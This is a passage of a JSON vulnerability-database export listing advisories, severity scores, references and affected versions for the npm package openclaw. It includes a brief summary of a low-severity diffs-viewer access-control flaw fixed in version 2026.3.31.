ring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N"},{"value":"9.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-30T14:13:12Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-session-sandbox-escape-via-session-status-tool"},{"reference_url":"https://github.com/advisories/GHSA-wcxr-59v9-rxr8","reference_id":"GHSA-wcxr-59v9-rxr8","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-wcxr-59v9-rxr8"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74883?format=json","purl":"pkg:npm/openclaw@2026.3.11","is_vulnerable":tr
ue,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vuln
erability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vuln
erability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vuln
erability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vuln
erability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vuln
erability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.11"}],"aliases":["CVE-2026-32918","GHSA-wcxr-59v9-rxr8"],"risk_score":4.2,"exploitability":"0.5","weighted_severity":"8.3","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-w8sb-7ymy-wkez"},{"url":"http://public2.vulnerable
code.io/api/vulnerabilities/90188?format=json","vulnerability_id":"VCID-watb-49vx-yub1","summary":"OpenClaw: diffs viewer misclassifies proxied remote requests as loopback when `allowRemoteViewer` is disabled\n## Summary\ndiffs viewer misclassifies proxied remote requests as loopback when `allowRemoteViewer` is disabled\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: low\n- Assessment: Shipped v2026.3.28 misclassified proxied diff-viewer requests as local loopback in some cases, a real but low-severity access-control flaw.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `30a1690323088fd291abd11643a264a6828a002c` — 2026-03-30T14:17:27-06:00\n\n## Release Process Note\n- The fix is already present in released version `2026.3.31`.\n- This draft looks ready for final maintainer disposition or publication, not additional code-fix work.\n\nThanks @smaeljaish771 for 
reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41403","reference_id":"","reference_type":"","scores":[{"value":"0.0006","scoring_system":"epss","scoring_elements":"0.19093","published_at":"2026-06-07T12:55:00Z"},{"value":"0.0006","scoring_system":"epss","scoring_elements":"0.19134","published_at":"2026-06-06T12:55:00Z"},{"value":"0.0006","scoring_system":"epss","scoring_elements":"0.19137","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41403"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"4.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/30a1690323088fd291abd11643a264a6828a002c","reference_id":"","reference_type":"","scores":[{"value":"2.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"4.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T19:09:33Z/"}],"url":"https://github.com/openclaw/openclaw/commit/30a1690323088fd291abd11643a264a6828a002c"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31","reference_id":"","reference_type":"","scores":[{"value":"4.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/A
V:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-3xv9-89fm-7h4r","reference_id":"","reference_type":"","scores":[{"value":"2.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"4.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T19:09:33Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-3xv9-89fm-7h4r"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41403","reference_id":"","reference_type":"","scores":[{"value":"4.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41403"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-access-control-bypass-via-proxied-remote-request-misclassification","reference_id":"","reference_type":"","scores":[{"value":"2.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"4.0","scoring_system":"cvssv3.1","scoring_element
s":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T19:09:33Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-access-control-bypass-via-proxied-remote-request-misclassification"},{"reference_url":"https://github.com/advisories/GHSA-3xv9-89fm-7h4r","reference_id":"GHSA-3xv9-89fm-7h4r","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-3xv9-89fm-7h4r"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerab
ility":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerab
ility":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["CVE-2026-41403","GHSA-3xv9-89fm-7h4r"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-watb-49vx-yub1"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91185?format=json","vulnerability_id":"VCID-wfkm-7ayk